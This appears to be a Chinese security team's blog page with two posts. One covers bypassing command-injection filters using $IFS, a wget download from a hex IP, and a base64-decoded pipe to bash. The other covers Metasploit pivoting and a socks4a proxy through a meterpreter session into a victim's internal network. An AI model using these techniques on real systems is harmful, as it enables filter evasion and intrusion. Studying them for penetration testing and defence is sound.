Wolf Group Security Team 狼组安全团队

打造信息安全乌托邦

嘿嘿嘿
03
Aug

Bypass skills for command execution

今天做测试的时候发现一些命令执行的地方,都会被开发做过滤
但是这些过滤是有迹可循的,或者是针对某个字符,关键字等,所以还是有bypass的办法
首先我们来看看在UNIX shell下的一些特殊变量
PS2变量,被定义为>号
PS4变量,被定义为+号
Internal Field Separator(IFS)
IFS,也被称为内部字段分隔符,是一个在shell下的特殊变量
它通常包含空格,tab,以及换行符,默认被shell视为一个分隔符
因此,我们可以使用它来代替空格
比如,我们需要输入ls /home
可以使用ls{$IFS}/home 或者 ls$IFS/home 来达到成功执行命令的效果。亲测有效

我们再看看针对常见字符串过滤的绕过方法
一种常见的方法是
使用wget 16进制ip
再执行文件
但是这种方法受到目录可写权限的限制,有时候会不太好用
另一种方法则是使用base64 -d
使用管道符号 echo xxx|base64 -d|bash 来达到成功执行命令的效果,都是亲测有效的~~

好了,先记录到这,等有了新研究再Update~~

08
Jul

metasploit - 目标内网代理

利用场景:有时候使用msf拿到meterpreter 反弹了,但是想把机器代理到对方的内网里,任何请求也走对方的内网。此刻需要使用到msf的辅助模块 socks4a(msf也有类似lcx功能模块,名字portfwd )

pivot是meterpreter最常用的一种代理,可以轻松把你的机器代理到受害者内网环境,下面介绍下pivot的搭建和使用方法

使用方法route add 目标i或ip段 Netmask 要使用代理的会话,通过实例来说明:

在metasploit添加一个路由表,目的是访问10.1.1.129将通过meterpreter的会话 1 来访问:

msf exploit(handler) > route add xxx.xxx.xxx.xxx 255.255.255.0 1
[*] Route added
msf exploit(handler) > route print 
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   xxx.xxx.xxx.xxx         255.255.255.255    Session 1

这里如果要代理10.1.1.129/24 到session 1,则可以这么写

route add xxx.xxx.xxx.xxx  255.255.255.0 1

到这里pivot已经配置好了,你在msf里对xxx.xxx.xxx.xxx 进行扫描(db_nmap)或者访问(psexe 模块,ssh模块等)将通过代理session 1这个会话来访问。

如果想通过其他应用程序来使用这个代理怎么办呢,这时候可以借助 metasploit socks4a提供一个监听隧道供其他应用程序访问:

首先使用 socks4a并且配置,监听端口

msf exploit(handler) > use auxiliary/server/socks4a 
msf auxiliary(socks4a) > show options 
Module options (auxiliary/server/socks4a):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.
Auxiliary action:
   Name   Description
   ----   -----------
   Proxy  
msf auxiliary(socks4a) > exploit -y
[*] Auxiliary module execution completed
msf auxiliary(socks4a) > 
[*] Starting the socks4a proxy server

05
Jul

WgpSec 狼组安全团队

WgpSec 狼组安全团队